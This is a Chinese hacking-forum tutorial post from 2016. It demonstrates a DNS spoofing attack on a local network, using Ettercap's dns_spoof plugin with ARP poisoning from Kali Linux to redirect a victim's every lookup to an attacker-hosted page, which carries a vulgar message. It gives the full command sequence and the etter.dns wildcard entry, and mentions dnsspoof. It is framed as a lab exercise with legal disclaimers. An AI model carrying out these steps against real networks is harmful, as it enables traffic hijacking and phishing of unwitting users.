HanDs
NO.2

演示DNS欺骗攻击 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

 DNS欺骗攻击基于中间人攻击。攻击者更改受害者从DNS服务器查询的域名解析结果,给受害者发送恶意网页或钓鱼网页-浏览器依然显示正常的url。

本帖介绍怎么使用Ettercap施行DNS欺骗攻击,实现受害者访问任何网站都转向到攻击者指定的网站。

情形描述 同一局域网内 受害者IP:192.168.0.106 攻击者系统Kali Linux,IP地址:192.168.0.108创建恶搞网站

在Kali Linux上创建恶搞网站。

启动Apache:

# service apache2 start

创建恶搞网页:

# vim /var/www/html/index.html

写入内容:

You Got Fucked!

你可以测试一下(http://192.168.0.108),看看Web是否可以正常提供服务。

DNS欺骗攻击

编辑文件:

# vim /etc/ettercap/etter.dns

在文件中添加一行:

* A 192.168.0.108

所有域名查询都解析为Kali Linux的IP地址。

DNS欺骗/ARP欺骗:

# ettercap -i wlan0 -T -P dns_spoof -M arp /192.168.0.106///

 

演示DNS欺骗攻击
 

测试

受害者访问网站:

 

演示DNS欺骗攻击

 

注意:地址栏的URL并没有变

你也可以使用nslookup命令查询DNS解析结果:

nslookup www.baidu.com

Kali Linux中另一个执行这种攻击的工具:dnsspoof。

# man dnsspoof


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
演示
#1楼
发帖时间:2016-8-11   |   查看数:0   |   回复数:0
游客组